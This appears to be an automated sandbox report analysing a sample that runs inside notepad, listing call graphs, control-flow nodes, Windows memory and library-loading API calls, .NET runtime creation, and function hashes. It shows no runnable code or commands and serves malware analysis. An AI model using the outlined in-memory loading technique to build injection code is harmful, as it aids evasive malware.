                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:15.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:27.1%
                    Total number of Nodes:48
                    Total number of Limit Nodes:7
                    execution_graph 1931 1d8a2f5a6b8 LoadLibraryA 1932 1d8a2f5a6da 1931->1932 1933 1d8a2f5a6d0 1931->1933 1932->1933 1934 1d8a2f5a70a VirtualProtect 1932->1934 1934->1933 1935 1d8a2f5a728 1934->1935 1936 1d8a2f5a736 VirtualProtect 1935->1936 1937 1d8a2f5a756 1936->1937 1937->1933 1938 1d8a2f5a771 VirtualProtect 1937->1938 1938->1933 1939 1d8a2f5a78a 1938->1939 1940 1d8a2f5a798 VirtualProtect 1939->1940 1940->1933 1941 1d8a2f5b503 1942 1d8a2f5b52a 1941->1942 1943 1d8a2f5b565 VirtualAlloc 1942->1943 1945 1d8a2f5b582 1942->1945 1944 1d8a2f5b5ae 1943->1944 1943->1945 1944->1945 1946 1d8a2f5b667 LoadLibraryA 1944->1946 1948 1d8a2f5b682 1944->1948 1954 1d8a2f5b85a 1944->1954 1946->1944 1947 1d8a2f5b902 VirtualFree 1947->1945 1948->1954 1956 1d8a2f5b736 1948->1956 1972 1d8a2f5a6ab 1948->1972 1950 1d8a2f5b70c 1951 1d8a2f5b710 1950->1951 1957 1d8a2f5a7c3 LoadLibraryA 1950->1957 1951->1950 1951->1954 1954->1947 1956->1954 1967 1d8a2f5b2bb 1956->1967 1958 1d8a2f5a7f2 1957->1958 1959 1d8a2f5a7e8 1957->1959 1958->1959 1960 1d8a2f5a822 VirtualProtect 1958->1960 1959->1954 1959->1956 1960->1959 1961 1d8a2f5a840 1960->1961 1962 1d8a2f5a84e VirtualProtect 1961->1962 1963 1d8a2f5a86e 1962->1963 1963->1959 1964 1d8a2f5a889 VirtualProtect 1963->1964 1964->1959 1965 1d8a2f5a8a2 1964->1965 1966 1d8a2f5a8b0 VirtualProtect 1965->1966 1966->1959 1968 1d8a2f5b2fb CLRCreateInstance 1967->1968 1969 1d8a2f5b310 1967->1969 1968->1969 1970 1d8a2f5b3f5 SysAllocString 1969->1970 1971 1d8a2f5b3b9 1969->1971 1970->1971 1971->1954 1973 1d8a2f5a6b8 LoadLibraryA 1972->1973 1974 1d8a2f5a6da 1973->1974 1975 1d8a2f5a6d0 1973->1975 1974->1975 1976 1d8a2f5a70a VirtualProtect 1974->1976 1975->1950 1976->1975 1977 1d8a2f5a728 1976->1977 1978 1d8a2f5a736 VirtualProtect 1977->1978 1979 1d8a2f5a756 1978->1979 1979->1975 1980 1d8a2f5a771 VirtualProtect 1979->1980 1980->1975 1981 1d8a2f5a78a 1980->1981 1982 1d8a2f5a798 VirtualProtect 1981->1982 1982->1975

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00007FFB4B4009E9 15 Function_00007FFB4B400200 0->15 88 Function_00007FFB4B400198 0->88 1 Function_000001D8A2F5D7CF 2 Function_000001D8A2F5C8CB 3 Function_000001D8A2F5F2C9 4 Function_000001D8A2F5CCD7 5 Function_000001D8A2F5D7D7 6 Function_000001D8A2F5CED3 7 Function_000001D8A2F5A6B8 7->4 8 Function_000001D8A2F5B2BB 9 Function_000001D8A2F5B1BB 10 Function_000001D8A2F5B1C7 11 Function_000001D8A2F5A7C3 11->4 12 Function_000001D8A2F5D7C0 13 Function_00007FFB4B40000A 14 Function_000001D8A2F5A6AB 14->4 16 Function_000001D8A2F5F2B4 17 Function_000001D8A2F5DBB4 17->3 18 Function_000001D8A2F5CC9F 19 Function_000001D8A2F5B19B 20 Function_000001D8A2F5CFA6 89 Function_000001D8A2F5EE23 20->89 21 Function_000001D8A2F5E9A1 21->16 21->20 43 Function_000001D8A2F5D86D 21->43 50 Function_000001D8A2F5CE5C 21->50 92 Function_000001D8A2F5EE08 21->92 22 Function_000001D8A2F5DBA1 23 Function_000001D8A2F5D08F 24 Function_000001D8A2F5D18D 31 Function_000001D8A2F5F290 24->31 24->89 25 Function_00007FFB4B4005A5 42 Function_00007FFB4B4000C8 25->42 49 Function_00007FFB4B4001D8 25->49 67 Function_00007FFB4B400178 25->67 26 Function_000001D8A2F5F096 44 Function_000001D8A2F5F26D 26->44 68 Function_000001D8A2F5F239 26->68 27 Function_00007FFB4B4001A0 28 Function_000001D8A2F5D094 28->16 29 Function_000001D8A2F5EF95 30 Function_000001D8A2F5AB93 102 Function_000001D8A2F5C7F7 30->102 32 Function_000001D8A2F5CF91 33 Function_000001D8A2F5DB91 34 Function_000001D8A2F5D178 35 Function_000001D8A2F5DB79 36 Function_000001D8A2F5AE87 37 Function_000001D8A2F5D184 38 Function_000001D8A2F5D582 47 Function_000001D8A2F5EE70 38->47 39 Function_000001D8A2F5C783 39->30 40 Function_000001D8A2F5D16E 41 Function_000001D8A2F5C76F 43->89 43->92 44->68 45 Function_000001D8A2F5C777 46 Function_000001D8A2F5D273 46->31 46->89 47->16 83 Function_000001D8A2F5EF32 47->83 48 Function_000001D8A2F5AE73 50->89 51 Function_000001D8A2F5CA5B 51->18 52 Function_000001D8A2F5BD5B 52->4 96 Function_000001D8A2F5CD13 52->96 103 Function_000001D8A2F5CCF7 52->103 107 Function_000001D8A2F5C4DF 52->107 108 Function_000001D8A2F5B1DB 52->108 53 Function_000001D8A2F5AD5B 54 Function_000001D8A2F5D359 54->16 54->29 54->47 55 Function_000001D8A2F5B267 56 Function_000001D8A2F5EB64 56->31 95 Function_000001D8A2F5DC15 56->95 57 Function_000001D8A2F5D162 58 Function_00007FFB4B4000CD 59 Function_000001D8A2F5C763 60 Function_000001D8A2F5E560 60->3 60->16 60->17 60->31 60->56 60->92 61 Function_000001D8A2F5004C 62 Function_000001D8A2F5DE48 62->16 62->21 62->24 62->26 62->29 62->31 62->46 62->47 62->54 62->60 64 Function_000001D8A2F5DC56 62->64 75 Function_000001D8A2F5D72E 62->75 76 Function_000001D8A2F5EE2D 62->76 84 Function_000001D8A2F5E232 62->84 63 Function_00007FFB4B400D62 64->92 65 Function_000001D8A2F5CE54 66 Function_000001D8A2F5C93F 69 Function_00007FFB4B400B71 69->27 70 Function_000001D8A2F5CF47 71 Function_000001D8A2F5D847 72 Function_000001D8A2F5CE45 73 Function_000001D8A2F5CF42 74 Function_000001D8A2F50042 76->38 77 Function_000001D8A2F5D82D 78 Function_000001D8A2F5B12B 79 Function_000001D8A2F5EE28 80 Function_00007FFB4B400882 81 Function_00007FFB4B400280 82 Function_000001D8A2F5AE37 84->92 85 Function_000001D8A2F5CF32 86 Function_000001D8A2F5CD33 86->62 86->76 86->89 87 Function_00007FFB4B400C9A 89->79 90 Function_000001D8A2F5B923 91 Function_00007FFB4B400225 93 Function_000001D8A2F5DB08 94 Function_000001D8A2F5AE15 97 Function_000001D8A2F5EDFE 98 Function_000001D8A2F5D7FB 99 Function_00007FFB4B400032 100 Function_000001D8A2F5D803 101 Function_000001D8A2F5B503 101->4 101->8 101->11 101->14 101->39 101->51 101->52 101->53 101->66 101->90 101->102 101->103 109 Function_000001D8A2F5A8DB 101->109 113 Function_000001D8A2F5C1E3 101->113 102->2 102->103 104 Function_000001D8A2F5EDF5 105 Function_000001D8A2F5D0DF 106 Function_000001D8A2F5D7DF 107->4 107->55 108->96 109->66 109->102 109->103 110 Function_000001D8A2F5AEDB 111 Function_000001D8A2F5EDE6 112 Function_000001D8A2F5D0E4 113->103 113->110

                    Executed Functions

                    Function 000001D8A2F5B503 Relevance: 4.9, APIs: 3, Instructions: 406memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 34 1d8a2f5b503-1d8a2f5b559 call 1d8a2f5c783 * 3 41 1d8a2f5b55b-1d8a2f5b55e 34->41 42 1d8a2f5b590 34->42 41->42 43 1d8a2f5b560-1d8a2f5b563 41->43 44 1d8a2f5b593-1d8a2f5b5ad 42->44 43->42 45 1d8a2f5b565-1d8a2f5b580 VirtualAlloc 43->45 46 1d8a2f5b5ae-1d8a2f5b5d9 call 1d8a2f5ccd7 call 1d8a2f5ccf7 45->46 47 1d8a2f5b582-1d8a2f5b589 45->47 53 1d8a2f5b5db-1d8a2f5b610 call 1d8a2f5c93f call 1d8a2f5c7f7 46->53 54 1d8a2f5b616-1d8a2f5b62d call 1d8a2f5c783 46->54 47->42 48 1d8a2f5b58b-1d8a2f5b58d 47->48 48->42 53->54 63 1d8a2f5b8ad-1d8a2f5b8b9 53->63 54->42 60 1d8a2f5b633-1d8a2f5b634 54->60 62 1d8a2f5b63a-1d8a2f5b640 60->62 64 1d8a2f5b682-1d8a2f5b68c 62->64 65 1d8a2f5b642 62->65 69 1d8a2f5b8ef-1d8a2f5b913 call 1d8a2f5ccf7 VirtualFree 63->69 70 1d8a2f5b8bb-1d8a2f5b8c5 63->70 66 1d8a2f5b68e-1d8a2f5b6a9 call 1d8a2f5c783 64->66 67 1d8a2f5b6ba-1d8a2f5b6c3 64->67 68 1d8a2f5b644-1d8a2f5b646 65->68 66->63 86 1d8a2f5b6af-1d8a2f5b6b8 66->86 74 1d8a2f5b6de-1d8a2f5b6e1 67->74 75 1d8a2f5b6c5-1d8a2f5b6cf call 1d8a2f5a8db 67->75 76 1d8a2f5b648-1d8a2f5b64e 68->76 77 1d8a2f5b663-1d8a2f5b665 68->77 87 1d8a2f5b91a-1d8a2f5b91c 69->87 88 1d8a2f5b915-1d8a2f5b917 69->88 70->69 71 1d8a2f5b8c7-1d8a2f5b8e8 call 1d8a2f5ccf7 70->71 71->69 74->63 83 1d8a2f5b6e7-1d8a2f5b6f1 74->83 75->63 94 1d8a2f5b6d5-1d8a2f5b6dc 75->94 76->77 84 1d8a2f5b650-1d8a2f5b661 76->84 77->64 79 1d8a2f5b667-1d8a2f5b680 LoadLibraryA 77->79 79->62 90 1d8a2f5b6fb-1d8a2f5b702 83->90 91 1d8a2f5b6f3-1d8a2f5b6f4 83->91 84->68 84->77 86->66 86->67 87->44 88->87 92 1d8a2f5b704-1d8a2f5b705 90->92 93 1d8a2f5b736-1d8a2f5b73a 90->93 91->90 95 1d8a2f5b707 call 1d8a2f5a6ab 92->95 97 1d8a2f5b848-1d8a2f5b850 93->97 98 1d8a2f5b740-1d8a2f5b762 93->98 94->90 99 1d8a2f5b70c-1d8a2f5b70e 95->99 100 1d8a2f5b8a2-1d8a2f5b8a8 call 1d8a2f5bd5b 97->100 101 1d8a2f5b852-1d8a2f5b858 97->101 98->63 111 1d8a2f5b768-1d8a2f5b77f call 1d8a2f5ccd7 98->111 104 1d8a2f5b71d-1d8a2f5b720 call 1d8a2f5a7c3 99->104 105 1d8a2f5b710-1d8a2f5b717 99->105 100->63 102 1d8a2f5b86f-1d8a2f5b881 call 1d8a2f5b2bb 101->102 103 1d8a2f5b85a-1d8a2f5b860 101->103 117 1d8a2f5b893-1d8a2f5b8a0 call 1d8a2f5ad5b 102->117 118 1d8a2f5b883-1d8a2f5b88e call 1d8a2f5b923 102->118 103->63 108 1d8a2f5b862-1d8a2f5b86d call 1d8a2f5c1e3 103->108 114 1d8a2f5b725-1d8a2f5b727 104->114 105->63 105->104 108->63 123 1d8a2f5b781-1d8a2f5b784 111->123 124 1d8a2f5b7a2-1d8a2f5b7c9 111->124 114->93 119 1d8a2f5b729-1d8a2f5b730 114->119 117->63 118->117 119->63 119->93 123->97 125 1d8a2f5b78a-1d8a2f5b79d call 1d8a2f5ca5b 123->125 124->63 130 1d8a2f5b7cf-1d8a2f5b843 124->130 131 1d8a2f5b845-1d8a2f5b846 125->131 130->63 130->131 131->97
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFreeLibraryLoad
                    • String ID:
                    • API String ID: 2147011437-0
                    • Opcode ID: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction ID: e95eaaaab54348c9a60ef55abd603f100af9ce15a3c1572be7f55d8b036d26fd
                    • Opcode Fuzzy Hash: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction Fuzzy Hash: A2D15430214A188BEB78EA2CD4D57EA73D2FB99305F54356FD48BC318ADE34E8468B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5B923 Relevance: .4, Instructions: 409COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 212 1d8a2f5b923-1d8a2f5b973 213 1d8a2f5b979-1d8a2f5b98c 212->213 214 1d8a2f5bb71-1d8a2f5bbaf 212->214 217 1d8a2f5bb68-1d8a2f5bb6c 213->217 218 1d8a2f5b992-1d8a2f5b9a6 213->218 221 1d8a2f5bbb5-1d8a2f5bbe4 214->221 222 1d8a2f5bd40-1d8a2f5bd5a 214->222 220 1d8a2f5bd3d-1d8a2f5bd3e 217->220 218->220 224 1d8a2f5b9ac-1d8a2f5b9dd 218->224 220->222 228 1d8a2f5bd2e-1d8a2f5bd38 221->228 229 1d8a2f5bbea-1d8a2f5bc0b 221->229 231 1d8a2f5bb11-1d8a2f5bb3c 224->231 232 1d8a2f5b9e3-1d8a2f5ba01 224->232 228->220 236 1d8a2f5bd25-1d8a2f5bd26 229->236 237 1d8a2f5bc11-1d8a2f5bc1d 229->237 235 1d8a2f5bb46-1d8a2f5bb49 231->235 242 1d8a2f5baa7-1d8a2f5baed 232->242 243 1d8a2f5ba07-1d8a2f5ba64 232->243 235->220 239 1d8a2f5bb4f-1d8a2f5bb63 235->239 236->228 240 1d8a2f5bcc9-1d8a2f5bccc 237->240 241 1d8a2f5bc23-1d8a2f5bc63 237->241 239->220 244 1d8a2f5bcce-1d8a2f5bd15 240->244 245 1d8a2f5bd20-1d8a2f5bd21 240->245 241->240 260 1d8a2f5bc65-1d8a2f5bc71 241->260 259 1d8a2f5baf5-1d8a2f5bb09 242->259 261 1d8a2f5baef-1d8a2f5baf0 243->261 262 1d8a2f5ba6a-1d8a2f5ba6b 243->262 244->245 253 1d8a2f5bd17-1d8a2f5bd18 244->253 245->236 253->245 259->231 260->240 263 1d8a2f5bc73-1d8a2f5bc79 260->263 261->259 264 1d8a2f5ba6e-1d8a2f5baa0 262->264 265 1d8a2f5bc7c-1d8a2f5bca7 263->265 270 1d8a2f5baa2-1d8a2f5baa5 264->270 271 1d8a2f5bca9-1d8a2f5bcb2 265->271 272 1d8a2f5bcb4-1d8a2f5bcc7 265->272 270->259 271->272 272->240 272->265
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction ID: 2a59b01d5df3732eb22ea87a3578cf435acffb93f6e0eca927580936ba582cd0
                    • Opcode Fuzzy Hash: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction Fuzzy Hash: 2CE13E31508B488BDB69DF28C889BAAB7E2FF94310F14566EE84BCB155DF30E546CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5A7C3 Relevance: 7.6, APIs: 5, Instructions: 125memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction ID: b47c44dcb8cb4df5cf53bee2b431e8ac93bb48d467b10e7085ccf76a3ad211da
                    • Opcode Fuzzy Hash: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction Fuzzy Hash: A431B43130CA198FEB68AA1CA8957AA73D5EBD4311F04216BEC4BC7285DD74DD4287C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5A6B8 Relevance: 7.6, APIs: 5, Instructions: 115memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction ID: 8da095f588f894e76295ccd8ed296e8cbfb770f89a57444ea2f8d44a04463717
                    • Opcode Fuzzy Hash: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction Fuzzy Hash: A531A43130CA188FDB68AA5CA89539A73D5FBD8320F04226BDC1BC32C9ED64DD1587C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5B2BB Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 1d8a2f5b2bb-1d8a2f5b2f5 136 1d8a2f5b2fb-1d8a2f5b30e CLRCreateInstance 135->136 137 1d8a2f5b3b5-1d8a2f5b3b7 135->137 138 1d8a2f5b38d-1d8a2f5b38e 136->138 139 1d8a2f5b310-1d8a2f5b34a 136->139 140 1d8a2f5b3b9-1d8a2f5b3bf 137->140 141 1d8a2f5b3c4-1d8a2f5b3d0 137->141 142 1d8a2f5b390-1d8a2f5b392 138->142 150 1d8a2f5b34c-1d8a2f5b35f 139->150 151 1d8a2f5b388-1d8a2f5b38b 139->151 143 1d8a2f5b4e7-1d8a2f5b502 140->143 147 1d8a2f5b4e4-1d8a2f5b4e5 141->147 148 1d8a2f5b3d6-1d8a2f5b425 SysAllocString 141->148 142->141 144 1d8a2f5b394-1d8a2f5b3ad 142->144 144->137 147->143 148->147 158 1d8a2f5b42b-1d8a2f5b441 148->158 150->144 155 1d8a2f5b361-1d8a2f5b369 150->155 151->142 155->142 156 1d8a2f5b36b-1d8a2f5b381 155->156 159 1d8a2f5b386 156->159 158->147 161 1d8a2f5b447-1d8a2f5b478 158->161 159->142 161->147 163 1d8a2f5b47a-1d8a2f5b486 161->163 164 1d8a2f5b49d-1d8a2f5b4a9 163->164 165 1d8a2f5b488-1d8a2f5b49b 163->165 166 1d8a2f5b4b1-1d8a2f5b4c3 164->166 165->164 165->165 167 1d8a2f5b4db-1d8a2f5b4dc 166->167 168 1d8a2f5b4c5-1d8a2f5b4d9 166->168 167->147 168->167 168->168
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocCreateInstanceString
                    • String ID:
                    • API String ID: 218245030-0
                    • Opcode ID: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction ID: ab0f16d49aa4c2562b5402a342b5a1cde47d4ee29c3a8d8fd602f2be333a686f
                    • Opcode Fuzzy Hash: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction Fuzzy Hash: 1D814031208B188FD778DF28C889BAAB7E1FFA5311F005A6ED49BC7155EE31E5458B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5A6AB Relevance: 1.5, APIs: 1, Instructions: 35memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction ID: 63104346e3118f1e1bca0ac31ac399e76e2037c63302b618c736dfc3685fa0f1
                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction Fuzzy Hash: 82E0D83120CA1D4FF77C969DE88A7B666D8D7953B1F00203FE549C2202E445D8A20391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B400D62 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 187 7ffb4b400d62-7ffb4b400d84 189 7ffb4b400d86-7ffb4b400d8b 187->189 190 7ffb4b400d8d-7ffb4b400d91 187->190 191 7ffb4b400d94-7ffb4b400dae 189->191 190->191 193 7ffb4b400db0-7ffb4b400de7 191->193 194 7ffb4b400ded-7ffb4b400e33 191->194 201 7ffb4b400de9-7ffb4b400deb 193->201 202 7ffb4b400e34-7ffb4b400e93 193->202 201->193 201->194 208 7ffb4b400e9a-7ffb4b400ecc 202->208
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID: PY<K
                    • API String ID: 0-467215462
                    • Opcode ID: f6e21532db9afb537c1a3fd59c5772744f77cca7308a42cbc93ae3df41aea4cc
                    • Instruction ID: bac45e0a0054632e59cd271497d28fd5dfc960f16a2d1c3d205c5728c8995c98
                    • Opcode Fuzzy Hash: f6e21532db9afb537c1a3fd59c5772744f77cca7308a42cbc93ae3df41aea4cc
                    • Instruction Fuzzy Hash: 05412961A1DB4A4FE34ABB3CD41227577D1EF9A314B4840FAD88DC72E3DD18AC428361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B4005A5 Relevance: .3, Instructions: 293COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 029c1dafeefebe6f6b62eef75203dbd7092da897d1b0459b71215e644268cb14
                    • Instruction ID: 00c1063409d4ecd93b0dbf8e6e64d6aca8929d62b78d83ff5cf43b5d4fbd5309
                    • Opcode Fuzzy Hash: 029c1dafeefebe6f6b62eef75203dbd7092da897d1b0459b71215e644268cb14
                    • Instruction Fuzzy Hash: 71912B70A0EA894FE78ABB3CD5255A93BE2EF4A34875044FED44DC72E3CD29AD048751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B4009E9 Relevance: .2, Instructions: 160COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a52c372ee7e45d8ca5621a6bed80b679c51ac39e42db5573e6ee9d598217c7e
                    • Instruction ID: 8c5436f9e93bd7268fd0532f553a660220c7b7042f42ae6fce4b189b57c06b7e
                    • Opcode Fuzzy Hash: 4a52c372ee7e45d8ca5621a6bed80b679c51ac39e42db5573e6ee9d598217c7e
                    • Instruction Fuzzy Hash: 4A517270A09A8D8FEB86EB78C5106A87BB1EF5A304F5445F9D448DB2A3CD29AC45C721
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B400882 Relevance: .2, Instructions: 160COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d20df52ffa1a42063df9dbcadf717eecc055af24d214d96492a8a3b76f4dcfe4
                    • Instruction ID: 753b4f87b01aa33aa283bcecb10edd370c6dd63910582050b85e016bfde0ac61
                    • Opcode Fuzzy Hash: d20df52ffa1a42063df9dbcadf717eecc055af24d214d96492a8a3b76f4dcfe4
                    • Instruction Fuzzy Hash: 41412761B1DA890FE78AAB3C88192797BD6EF9A310F0941FFE44DC72A3DD185C068351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B4000C8 Relevance: .1, Instructions: 141COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 379 7ffb4b4000c8-7ffb4b4009e4
                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75919f673d24b173ba819f6d7d65ba33ccda0331ba80bf39db7640d49118b86a
                    • Instruction ID: d1fccbc4a34857b681513682f6571578d003cfa87ed8cee96fd95bba95ef0ace
                    • Opcode Fuzzy Hash: 75919f673d24b173ba819f6d7d65ba33ccda0331ba80bf39db7640d49118b86a
                    • Instruction Fuzzy Hash: 3731F5A1B1CA494FE799EB3CD45A378B6C6EF9C354F0445BAE40EC32A3DD249C428381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFB4B400B71 Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 400 7ffb4b400b71-7ffb4b400c84 call 7ffb4b4001a0 422 7ffb4b400c89-7ffb4b400c99 400->422
                    Memory Dump Source
                    • Source File: 00000006.00000002.2208010685.00007FFB4B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B400000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffb4b400000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 90f8e677758fa074d1b6183becf7ec42e82a8a88e8074b225e6c4d7cc113ab04
                    • Instruction ID: c5f8dc29488b471128f163aa0d5149c1647fbdec49ad6a4ae4caf9fee8ec8c60
                    • Opcode Fuzzy Hash: 90f8e677758fa074d1b6183becf7ec42e82a8a88e8074b225e6c4d7cc113ab04
                    • Instruction Fuzzy Hash: 0E3108A1F1DA4A4FEB85BBBCC85A3B877D5EF98705F4042BAE40DC3293DD18584183A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 000001D8A2F5BD5B Relevance: .5, Instructions: 500COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction ID: ff96b81fbb0d7f2942bc7d6f0d275e9b263abd51143b5276175acb7dceeb4b6f
                    • Opcode Fuzzy Hash: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction Fuzzy Hash: 6DF16230614A198BEB78DF6CC8857A9B3E1FB54311F54662FD89BC3295DF34E8428B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D8A2F5C1E3 Relevance: .3, Instructions: 283COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D8A2F50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1d8a2f50000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
